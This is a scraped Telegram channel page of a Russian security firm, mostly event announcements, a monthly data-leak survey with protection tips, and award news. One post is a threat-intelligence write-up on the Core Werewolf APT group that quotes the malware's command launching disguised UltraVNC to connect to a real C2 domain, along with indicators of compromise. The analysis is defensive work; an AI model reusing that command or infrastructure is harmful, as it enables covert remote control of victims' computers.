Telegram Web Link
Forwarded from ИнфоТеКС
Media is too big
VIEW IN TELEGRAM
🟣 Большой Московский ИнфоТеКС ТехноФест

Артем Савчук, технический директор компании «Перспективный мониторинг», анонсировал темы докладов команды компании и пригласил всех, кому интересна тема кибербезопасности, пройти предварительную регистрацию.

ℹ️ Участие бесплатное, количество мест ограничено.

#ИнфоТеКС_ТехноФест #ИнфоТеКСТехноФест_Москва
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13🎉3👏2🤩2
Мониторинг утечек данных за август 2025 года

В августе было зафиксировано более 20 инцидентов. Основной удар пришёлся на государственные структуры, коммерческие компании, медицинские организации и сферу развлечений.

Суммарный объём утечек превысил 400 млн записей и сотни гигабайт конфиденциальных данных, включая персональные сведения, медицинскую информацию, учётные записи и данные заказов пользователей.

❗️ Основные пострадавшие сферы и объёмы утечек:

🟧Коммерческий сектор — более 432 млн записей. Стоит отметить, что большая часть этих данных относится к одной утечке и содержит метаинформацию о более 10 млн заказов в ритейле.
🟧Развлечения — 400 записей.
🟧Медицина — 34 тыс. записей.
🟧Государственный сектор — 15,3 млн записей.


❗️ Общие цифры:

🟧Общее количество утечек: более 447 млн записей.
🟧Медиана по числу записей: ~43 тыс.
🟧Средний размер утечки: ~21,3 млн записей.

❗️ Что важно знать:

🟧Наибольший удар пришёлся на коммерческий сектор, особенно онлайн-ритейл.
🟧Основная часть приходится на несколько крупных инцидентов связанных с ранее приватными базами данных.
🟧Утечки в медицинской сфере сохраняют высокую критичность.
🟧Крупные инциденты активно продаются на закрытых платформах.

❗️ Тренды:

🟧Усиливается масштаб утечек в e-commerce и маркетплейсах.
🟧Сохраняется интерес атакующих к государственным ресурсам.
🟧Продолжается рост утечек, связанных с CRM-системами и онлайн-торговлей.
🟧Увеличилось число крупных «смешанных» инцидентов, включающих базы данных и файловые архивы.
🟧Мелкие утечки в коммерческом секторе становятся регулярным фоном.

❗️ Как защититься:

🟧Проверяйте, не были ли ваши данные скомпрометированы: воспользуйтесь сервисом НКЦКИ 🔗 «Безопасность пользователей в сети Интернет».
🟧Не используйте один и тот же пароль на разных платформах, особенно если ваша почта фигурирует в слитых базах.
🟧Включите двухфакторную/многофакторную аутентификацию.
🟧Обратите внимание на возможный фишинг: утёкшие данные могут использоваться для персонализированных атак.

#мониторинг_угроз
Please open Telegram to view this post
VIEW IN TELEGRAM
👍65🔥53
5 сентября завершился хакатон ГОРОД IT: HACK 2025

В хакатоне приняли участие 70 студентов в составе 15 команд из вузов Томска. Наши эксперты на хакатоне — Эмиль Мирмаметов, ведущий разработчик, и Антон Ильин, тимлид команды разработки сценариев для Ampire.

Лучшей в выполнении кейсов стала команда bad bananas из Томского политехнического университета. Команда выполняла кейс 🐶ПМ по разработке инфраструктуры киберфизической модели космического лифта.

ℹ️Космический лифт — это интерактивный макет, который действует в иммерсивном пространстве единственного в мире постоянно действующего фиджитал-полигона в Кибердоме в Москве.

«ГОРОД IT: HACK – первый опыт выставления задач на хакатоне для ПМ. Команда bad bananas создала действительно интересное решение. Ребята разработали веб-систему, состоящую из нескольких сервисов, включая модуль управления космолифтом с показателями телеметрии, клиентское приложение для сбора заявок и сервис визуализации загрузки складских ячеек. При этом были выполнены даже задания со звёздочкой, в которых надо было предусмотреть в системе уязвимости, которые может проэксплуатировать хакер», - Антон Ильин, тимлид команды разработки сценариев для Ampire


В планах ПМ доработать решение, интегрировать его в платформу 🥇Ampire и апробировать на физическом макете космического лифта в Кибердоме.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1131
# ТриЧетыре: во время Волгоградского фестиваля состоялись киберучения

🏎🏎🏎🏎🏎🏎
5 сентября школьники, студенты и специалисты органов исполнительной власти приняли участие в киберучениях в рамках Волгоградского молодежного фестиваля # ТриЧетыре в Точке кипения ВолгГТУ.

Студенты СПО и вузов познакомились с киберполигоном 🥇Ampire и выполнили задания по нейтрализации компьютерной атаки. Для школьников провели лекцию по основам кибербезопасности, а затем ребята в соревновательном формате выполняли на киберполигоне 🥇Ampire Junior задания по цифровой грамотности и поиску расположения объектов, основываясь на фотографиях и других геопространственных данных. Для сопровождающих учителей и преподавателей была подготовлена лекционная часть об информационной безопасности.

Для нас очень важно обеспечить развитие цифровой грамотности населения Волгоградской области во всех возрастных категориях, начиная со школьников. Именно поэтому мы постарались организовать киберучения для всех — учащихся школ, вузов, СПО, а также, конечно, для действующих специалистов региональных органов исполнительной власти. Уверена, что это мероприятие станет толчком для продолжения изучения цифровой грамотности всеми участниками соревнований, - Ирина Муравьева, председатель комитета молодежной политики Волгоградской области.

По итогам соревнований победителями среди школьников стали команды:
🟠1 место - МОУ «Лицей № 5 имени Ю.А. Гагарина Центрального района Волгограда»,
🟠2 место - МОУ «Лицей № 2 Краснооктябрьского района Волгограда»,
🟠3 место - МОУ «Средняя школа № 45 Дзержинского района Волгограда».

🟠В соревнованиях студентов победителем стала команда Волгоградского технологического колледжа.

Соревнования на Ampire проводили преподаватели 🐶ПМ Наталия Кабакова и Александр Фефилов.

🔗 Источник
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8
ПМ расскажет о взаимодействии с ГосСОПКА на конференции в Алтайском крае

📆 18 сентября в Барнауле пройдёт первая в Алтайском крае конференция по информационной безопасности «Реальный КИБЕРБЕЗ».

Максим Кувшинов, руководитель обособленного подразделения «Перспективного мониторинга» в Новосибирске, выступит с докладом «У писем нет API: как правильно наладить взаимодействие с ГосСОПКА».
Please open Telegram to view this post
VIEW IN TELEGRAM
71
Специалисты ПМ получили награды от Минцифры Кузбасса

12 сентября в преддверии Дня программиста состоялся IV региональный форум «Кузбасс в цифре», который стал важной площадкой для обсуждения актуальных вопросов цифровизации, внедрения современных технологических решений и перспектив развития цифровой инфраструктуры региона.

В рамках форума состоялось торжественное награждение ИТ-специалистов отраслевыми и региональными наградами, которыми был отмечен вклад в развитие цифровизации Кузбасса.

Награды получили специалисты ПМ:

🟠руководитель учебно-методического направления Александр Фефилов — нагрудный знак «За цифровое развитие Кузбасса»,
🟠менеджер продукта «Экспертные данные» Кирилл Кузнецов — благодарственное письмо за личный вклад в развитие цифровизации Кузбасса,
🟠заместитель начальника Центра мониторинга компьютерных атак Александр Клевцов — благодарственное письмо за личный вклад в развитие цифровизации Кузбасса.

Кирилл Кузнецов также выступил на форуме с докладом  «AM Threat Intelligence Portal — актуальные сведения о киберугрозах».

ℹ️ Организатором мероприятия выступает Министерство цифрового развития и связи Кузбасса, оператором — АНО «Развитие цифровой экономики Кузбасса».
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
13👏6🎉541
Опубликована полная запись выступления Василия Кравца на OFFZONE

Доклад охватил некоторые малоизвестные особенности реестра Windows. Небольшая часть была посвящена тому, как реестр устроен внутри и почему ветка HKEY_CURRENT_USER на самом деле не существует.

Кроме того, в докладе были рассмотрены некоторые типы ключей и значений, а также их особенности, которые в том числе могут быть полезны в исследовании и эксплуатации уязвимостей.

📺 Смотреть видео
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1243
Специалисты направления исследований киберугроз зафиксировали новую активность APT-группировки Core Werewolf

😀😀😀😀

Группировка Core Werewolf, также известные как Awaken Likho и PseudoGamaredon, применяет нестандартные способы маскировки

❗️Вектор атаки:
Несколько месяцев назад мы уже описывали популярный вектор атаки данной группировки с новыми модификациями ВПО.
В выявленной же недавно кампании злоумышленники снова начали применять особые методы обхода обнаружения.

Для первоначального доступа злоумышленники все также использовали вредоносный RAR-архив, внутри которого находился троян типа «дроппер» с наименованием «Уведомление №221 о начале комплексной проверки согласно плану утечек8.exe». При запуске данного ВПО выполнялась распаковка файлов с названиями:
🟠«32193.YApCfK»
🟠«8152»
🟠«HUBfz5.MCUj1n»
🟠«ITrc7L.QpK2Yd»
🟠«dJ7hAl.diPznA»
Проведенный анализ показал, что файл с наименованием «8152» имеет расширение «.cmd». Отличительной чертой данного cmd-файла, по сравнению с ранее зафиксированными, являлось его содержимое (скриншот 1).

Злоумышленники использовали технику T1027.010: Obfuscated Files or Information: Command Obfuscation для скрытия выполняемых команд внутри файла. Так, названия файлов содержались в разных переменных. Собрав их вместе, можно обнаружить, что при запуске «8152.cmd»:
🟠Выполняется копирование файла «ITrc7L.QpK2Yd» в «Resul9.pdf». Сам Resul9.pdf является отвлекающим документом (скриншот 2)
🟠Файл «HUBfz5.MCUj1n» копируется в «UltraVNC.ini». По названию второго становится ясно, что это конфигурационный файл ПО «UltraVNC» (скриншот 3)
🟠Через команду /copy создается копия файла «dJ7hAl.diPznA» с новым наименованием «Msedges.exe»
🟠Выполняется проверка наличия в системе файла «32193.cmd». В случае, если файл обнаружен, происходит его запуск cmd /c %HOMEPATH%\Documents\32193.cmd

На следующем этапе, где злоумышленники используют все тот же способ маскировки (скриншот 4), через файл «32193.cmd» выполняется запуск «Msedges.exe» в директории %HOMEPATH%\Documents\ (T1036.005: Masquerading: Match Legitimate Resource Name or Location).

Далее используемый файл с функционалом UltraVNC запускается повторно с опциями автоматического восстановления C2-соединения: %HOMEPATH%\Documents\Msedges.exe -autoreconnect ID:_lzNjSq_%COMPUTERNAME% -connect autovekb96.ru:443
Кроме этого, анализ файлов «32193.cmd» и «8152.cmd» также показал, что злоумышленники применяют неоднократно команду timeout /t с разными значениями между выполнением других команд. Здесь злоумышленники используют еще одну технику маскировки — T1497.003: Virtualization/Sandbox Evasion: Time Based Evasion

Специалисты Перспективного мониторинга продолжают отлеживать активность группировки Core Werewolf и актуализовать данные о ее методах и инструментах

❗️Индикаторы компрометации:
IP:
45.144.67[.]251

Domains:
autovekb96[.]ru

SHA256:
82f5e455ebce674b4382bf2e7d0c58d67a11af3f861ea4ee1c431013d5ffe85e (Уведомление №221 о начале комплексной проверки согласно плану утечек8.exe/Latun.exe/mirolf.exe)
dce7e7ad8e3fa8d340bfa0fd5e0b8982878d20514e17ee3a9f31f46c4cd4debf (32193.cmd/32193.YApCfK)
0db6a2e14f5039f7d70cd2560a2a8df54e3053e52c467162ac51ae0653076bae (8152.cmd)
f7d4080ad8259b0aac2504f8b5d8fab18e5124321c442c8bcb577598059d0b24 (Msedges.exe/NPbJUS.EgQXPl/dJ7hAl.diPznA)
ef7c8f0e6c3b36d00a9a643a51b7cd94dc3a67be3c86a87973290be8a1ee6a15 (RAR-архив)


❗️В базах решающих правил AM Rules ПМ присутствуют детектирующие правила, позволяющие обнаружить не только конкретную описанную угрозу, но и предотвратить аналогичную активность злоумышленника в дальнейшем!

🔎Проверить собственные индикаторы компрометации на вредоносность с помощью AM TIP🔎

#AM_Rules
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥135🤩42👍1
Forwarded from ИнфоТеКС
Media is too big
VIEW IN TELEGRAM
🟣 Большой Московский ИнфоТеКС ТехноФест

Георгий Мелихов, менеджер продукта Ampire компании «Перспективный мониторинг», анонсировал доклады на ТехноФесте о жизни киберполгиона Ampire и планах его дальнейшего развития.

ℹ️ Участие бесплатное, количество мест ограничено. Требуется предварительная регистрация.

#ИнфоТеКС_ТехноФест #ИнфоТеКСТехноФест_Москва
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍2🔥2
ПМ подпишет соглашение о сотрудничестве с Министерством цифрового развития и связи Амурской области на форуме «Амур-Инфобез»

📆 18-19 сентября в Благовещенске состоится Межрегиональный форум по информационной безопасности и импортозамещению в сфере IT «Амур-ИнфобезФорум 2025» — главное событие 2025 года в сфере информационной безопасности и информатизации в Амурской области.

«Перспективный мониторинг» — среди самых активных гостей форума.

😀😀😀

18 сентября
секция «Информационная безопасность» начнётся с подписания соглашения о сотрудничестве между ПМ и Министерством цифрового развития и связи Амурской области. ПМ будет представлять генеральный директор Роман Кобцев.

В этой же секции заместитель руководителя отдела исследований киберугроз Анна Хромова выступит с докладом «Киберландшафт угроз: от технологий до человеческого фактора».

😀😀😀😀😀

19 сентября руководитель учебно-методического направления Александр Фефилов проведёт киберучения для участников форума. Ожидается, что в них примут участие около 30 человек.

Анна Хромова проведёт мастер-класс на Ampire Junior по инструментам GEOINT.

ℹ️ «Амур-Инфобез Форум» является самым посещаемым мероприятием в Амурской области. Ожидается что в работе форума примут участие более 250 человек: представители исполнительных органов государственной власти, органов местного самоуправления и других государственных учреждений и частных компаний Амурской области. Организаторами Амур-Инфобезфорума выступают Министерство цифрового развития и связи Амурской области, Центр информационных технологий Амурской области и компания «СТОЖАРЫ».
Please open Telegram to view this post
VIEW IN TELEGRAM
82
2025/10/21 11:51:14
Back to Top
HTML Embed Code: